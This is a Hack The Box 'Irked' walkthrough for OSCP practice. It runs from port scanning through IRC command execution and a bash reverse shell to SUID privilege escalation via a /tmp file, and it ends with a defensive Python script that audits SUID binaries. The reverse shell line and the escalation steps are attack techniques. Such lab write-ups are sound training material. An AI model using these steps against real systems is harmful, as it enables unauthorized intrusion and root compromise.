OSCP PREPARATIONS – HTB Irked

Irked is one of the retired Hack The Box machines and runs Linux.
We start by scanning the target.


classic scan

TCP Port Full scan

UDP Full Scan

Here are the open ports, in order:
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
6697/tcp open ircs-u
8067/tcp open infi-async
34900/tcp open unknown
65534/tcp open unknown
Among these ports, the one that draws our attention is port 6697, which the classic scan misses and only the full port scan reveals. To see the details of the service running on this port:

The IRC protocol is running on this port. We note this as additional information for now.
HTTP is running on port 80, so we access the service in a browser.

We perform a directory scan with gobuster.

Directory discovery did not turn up any significant information.
One thing on the web service does draw our attention: a mention of IRC.
That's why we focus on port 6697, where IRC runs.

Let's connect to IRC with ncat:
nc 10.10.10.117 8067
We got a hostname error while connecting. We edit the /etc/hosts file and reconnect.

(received error)

Hostname added
Reconnecting

After the connection is established, we send a ping command to test whether commands we send are executed.

As you can see, the command works.

This way we can get a reverse shell back to our own machine.
For a bash reverse shell we use the following command, with ncat listening in the background on our side:
bash -c "bash -i >& /dev/tcp/10.10.14.3/1234 0>&1"

We got our reverse shell.
We couldn't read the user flag. We kept getting a Permission denied error.

We perform enumeration to escalate privileges on the machine.

We could not obtain any information in the enumeration part, so I got help here. We are expected to download the jpg file and extract the data hidden in it with steganographic methods.

With the obtained password, we connect over SSH as djmardov.

In this way, we were able to obtain the user flag.
We tried to go to the root folder, but we got a Permission denied error. Privilege escalation is required here.

We perform enumeration again to escalate privileges. I used the LinEnum.sh tool because manual enumeration takes a long time.

Inspecting the output, we focus on the SUID file viewuser because of its time difference.

Viewuser executed

Here it says /tmp/listusers was not found. There is no such file, so apparently we should try to create one there.
We created it, and this time we got a Permission denied error.

Let's give this file execute permission.

Once the permission is set, viewuser can be run.

We saw that it returns the id value.
Now we have it give us a shell with the sh command.

As you can see, we got root permission 😊
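
The root cause of this last step is a SUID binary that runs a file from world-writable /tmp. As an added example (not part of the original write-up), this Python script flags SUID files whose embedded strings reference paths under world-writable directories; the directory list, function names and sample bytes are assumptions made for illustration.

```python
import os
import re
import stat
import sys

# Assumption: directories any local user can write to on a typical Linux host.
WORLD_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")

# Printable-ASCII runs that look like absolute paths (what `strings` would show).
PATH_RE = re.compile(rb"/[\x21-\x7e]{3,}")


def risky_paths(blob: bytes) -> list:
    """Return embedded absolute paths that live under a world-writable directory."""
    found = []
    for m in PATH_RE.finditer(blob):
        path = m.group().decode("ascii")
        if path.startswith(WORLD_WRITABLE) and path not in found:
            found.append(path)
    return found


def is_setuid(path: str) -> bool:
    """True for regular files with the set-user-ID bit set."""
    st = os.lstat(path)
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & stat.S_ISUID)


def audit(root: str) -> dict:
    """Map each SUID file under root to the world-writable paths it references."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                if not is_setuid(full):
                    continue
                with open(full, "rb") as fh:
                    hits = risky_paths(fh.read())
            except OSError:
                continue  # unreadable or vanished file
            if hits:
                report[full] = hits
    return report


# Constructed sample: bytes shaped like a binary that calls a helper in /tmp.
SAMPLE = b"\x7fELF\x00setuid\x00/usr/bin/who\x00/tmp/listusers\x00\x01\x02"

if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "/usr"
    for binary, paths in audit(root).items():
        print(binary, "->", ", ".join(paths))
```

Any hit deserves review: a privileged program should call helpers only from root-owned directories that other users cannot write to.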
